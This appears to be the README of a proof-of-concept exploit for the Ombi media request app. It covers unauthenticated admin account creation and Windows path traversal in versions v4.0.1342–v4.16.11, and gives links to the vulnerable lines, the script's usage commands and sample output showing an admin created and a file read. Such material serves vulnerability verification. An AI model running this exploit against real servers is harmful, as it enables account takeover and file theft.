PoC exploit for Ombi
This is a proof of concept exploit used to verify if your Ombi install is vulnerable to unauthenticated admin account creation and path-traversal attack.
This affects version v4.0.1342 - v4.16.11.
This script attempts to create an admin account named 'administrator' and then attempts to read a file using the provided filepath.
The path traversal vulnerbility is only exploitable on Windows as dotnet on Linux doesn't decode %2F - see ASP.NET Core 11544.
Vulnerable Lines:
https://github.com/Ombi-app/Ombi/blob/v4.16.1/src/Ombi/Controllers/V1/IdentityController.cs#L117
https://github.com/Ombi-app/Ombi/blob/v4.16.1/src/Ombi/Controllers/V2/SystemController.cs#L47
python3 .\exploit.py --scheme http --hostname 127.0.0.1 --port 5000 --path '../../HelloWorld.txt'
python3 .\exploit.py --scheme http --hostname 127.0.0.1 --port 5000 --path '../../HelloWorld.txt'
[+] Checking accessibility (http://127.0.0.1:5000) status... AVAILABLE
[+] Attempting to create 'administrator' with password '6QCKUk9MMteiEt2X5osoxw'
[*] Successfuly created administrator at http://127.0.0.1:5000
[+] Attempting to retrieve bearer token... Successful
[+] Attempting to read ..%5C..%5CHelloWorld.txt
Hello, World!
- Python 3